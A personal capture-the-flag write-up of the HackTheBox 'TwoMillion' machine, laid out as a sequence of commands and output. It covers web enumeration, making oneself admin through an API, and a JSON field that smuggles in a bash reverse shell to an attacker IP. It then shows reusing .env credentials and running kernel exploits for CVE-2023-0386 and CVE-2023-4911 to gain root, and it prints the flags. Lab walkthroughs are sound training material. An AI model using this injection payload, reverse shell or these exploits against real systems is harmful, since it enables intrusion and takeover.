~/ Home Projects Tools Link
Writeups
hackthebox/
  • 2million
  • Facts
  • Checkpoint
  • Enigma
  • Nimbus
  • Reactor
  • tryhackme/
  • Wonderland
  • Highschool
  • Ignite
  • JokerCTF
  • Lazy Admin
  • Lightroom
  • Lookup
  • Love Connect
  • Love note
  • Pyrat
  • Startup
  • Tryheartme
  • Valenfind
  • Valley
  • When hearts collide
  • HTB - TwoMillion

    ####HTB 2million#### # # #Recon nmap -sV -sC -v 10.129.229.66 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA) |_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519) 80/tcp open http nginx | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: Did not follow redirect to http://2million.htb/ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel #add to host file sudo echo '2million.htb 10.129.229.66' >> /etc/hosts #Found website and theres a login page #When you input a random account and password you get #http://2million.htb/login?error=User+not+found #Tried enumerating from login? with ffuf ffuf -w /usr/share/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://2million.htb/login?FUZZ -fs 3704 #-fs 3704 to remove most of the noise #only returns error http://2million.htb/login?error=id #returns id in the page #Seems like i can pan pass some inputs here #Attempted to inject PHP, HTML, JS, SQL, Bash (no bueno) #Look at the invite code page, found an endpoint curl -s -X POST http://2million.htb/api/v1/invite/how/to/generate #ROT13 returns an address curl -s -X POST http://2million.htb/api/v1/invite/generate #Returns a base64 string echo 'SEY2QkQtTklFUlotN1pMREMtTzJKMzY=' | base64 -d #Returns HF6BD-NIERZ-7ZLDC-O2J36 #Made an account, found a VPN connection file that didn't work #Some endpoint makes the file #curled a list of endpoints with curl -X GET "http://2million.htb/api/v1" -H "Cookie: PHPSESSID=ou73gn1krm2asr0f0b2i31d68r" | jq #Can't use /api/v1/admin/* but we can add admin to ourselves with PUT /api/v1/admin/settings/update and change {"loggedin":true,"username":"penis","is_admin":1} #We have now access to api/v1/admin/* POST /api/v1/admin/vpn/generate + Content-Type: application/json {"username":"; bash -c 'bash -i >& /dev/tcp/10.10.14.21/6969 0>&1' ;"} #On attacker run netcat nc -lvnp 6969 #Looked around for username or passwords and found some in an .env DB_HOST=127.0.0.1 DB_DATABASE=htb_prod DB_USERNAME=admin DB_PASSWORD=SuperDuperPass123 #we now ssh as admin with our SuperDuperPass123 ssh admin@10.129.229.66 #We can now read user.txt 2a2286a0cfffc35bc6c21db7892ca63e #We now need to escalate our privilege #We can find find a way to upload linpeas.sh to find escalation vulnerabilities #Theres only 2 port and 22/ssh is available so we use a protocol that shares the port number like SCP scp ./linpeas.sh admin@10.129.229.66:/home/admin/ #Turns up some vulnerabilities that could be exploited and /var/mail/ cat /var/mail/admin #Returns a few interesting information From: ch4p Cc: g0blin Date: Tue, 1 June 2023 [...] few serious Linux Kernel CVE [...] That one in OverlayFS / FUSE looks nasty. [...] HTB Godfather #This OverlayFS / Fuse CVE in 2023 seems promising CVE-2023-0386 #Found a poc https://github.com/sxlmnwb/CVE-2023-0386 #Moonrunes can't tell how it works, had to OSINT to make sure its legit #Its legit, we need to install it on target then make all ./fuse ./ovlcap/lower ./gc #Make a second terminal window ./exp #We are now root so we can read the flag at /root/root.txt cat /root/root.txt #And it just works? That easy. 89ad60289fef053de3e63bf94c1ab601 # #Apparently theres an extra Privilege escalation with the GLIBC lib #The name of the vulnerability is Looney Tunables CVE-2023-4911 #Tried a POC that didnt work, it was missing pwntools on victim (lmao) #Found a python3 script @ haxx.in/files/gnu-acme.py #We send the file over with scp scp ./gnu-acme.py admin@10.129.229.66:/home/admin/ #Enter password: SuperDuperPass123 #Back to victim we run the script with python3 gnu-acme.py #Now we are root and can get the flag with this exploit